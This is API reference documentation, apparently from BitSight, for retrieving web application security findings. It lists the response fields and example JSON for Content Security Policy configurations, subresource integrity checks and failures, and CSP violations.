⇤ Web Application Security Findings
https://api.bitsighttech.com/ratings/v1/companies/company_guid/findings?risk_vector=web_appsec
Get cross-site scripting evidence, including:
- Content Security Policy Configurations
- Cross-Domain Subresource Integrity Check
- Cross-Domain Subresource Integrity Failure
- CSP Violations
For details specific to Web Application Security, use the ?risk_vector=web_appsec
parameter. Other query parameters are listed in GET: Finding Details.
Content Security Policy Configurations
[assessmentName
= cross_domain_subresource_integrity_check
]
Example Response
{ "message": "'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.", "documentUrl": "url", "source": "header", "directive": "script-src", "value": [ "'unsafe-inline'" ], "details":"", "cspSeverity": 10, "type": 301, ⊕ See additional evidences }
Response Attributes
Field | Description |
---|---|
messageString |
A summary of the issue. |
documentUrlString |
The URL used to retrieve the CSP configuration. |
sourceString |
The location where the CSP configuration was loaded from. |
directiveString |
The CSP directive evaluated from a particular piece of evidence. |
valueArray |
The value of the CSP directive. |
detailsString |
|
cspSeverityInteger |
The severity of the CSP directive that will be used for grading. |
typeInteger |
The type of HTML resource. |
Cross-Domain Subresource Integrity Check
[assessmentName
= cross_domain_subresource_integrity_check
]
Example Response
{ "type": "link", "resource": "url", "hash": "Integrity attribute missing", ⊕ See additional evidences }
Response Attributes
Field | Description |
---|---|
typeString |
The type of HTML resource. |
resourceString |
A link to the resource as defined in the web application. |
hashString |
The hash value present in the HTML element. |
Cross-Domain Subresource Integrity Failure
[assessmentName
= cross_domain_subresource_integrity_failure
]
Example Response
{ "type": "Script", "resource": "url", "hash": "Failed to find a valid digest in the 'integrity' attribute for resource 'url' with computed SHA-256 integrity 'CdZ5YfsFUiC3gCJeUOvnoduGoxgDH0EugrrlwIuw+U4='. The resource has been blocked.", "resolution": "blocked", ⊕ See additional evidences }
Response Attributes
Field | Description |
---|---|
typeString |
The type of HTML resource. |
resourceString |
A link to the resource as defined in the web application. |
hashString |
The hash value present in the HTML element. |
resolutionString |
CSP Violations
[assessmentName
= csp_violation
]
Example Response
{ "lineNumber": 165, "resolutionStatus": "blocked", "message": "Refused to load the script 'url' because it violates the following Content Security Policy directive: \"script-src 'self' 'unsafe-inline' 'unsafe-eval' https://*.youtube.com\". Note that 'script-src-elem' was not explicitly set, so 'script-src' is used as a fallback.\n", "resourceUrl": "url", ⊕ See additional evidences }
Response Attributes
Field | Description |
---|---|
lineNumberInteger |
The line number in the source page. |
resolutionStatusString |
The action the browser took when loading the resource. |
messageString |
A summary of the issue. |
resourceUrlString |
The resource URL that had the CSP violation. |
- May 15, 2024: Added
details
to Content Security Policy Configurations response. - December 12, 2023: Included general finding details; Added table of contents.
- August 11, 2023: Published.
Feedback
0 comments
Please sign in to leave a comment.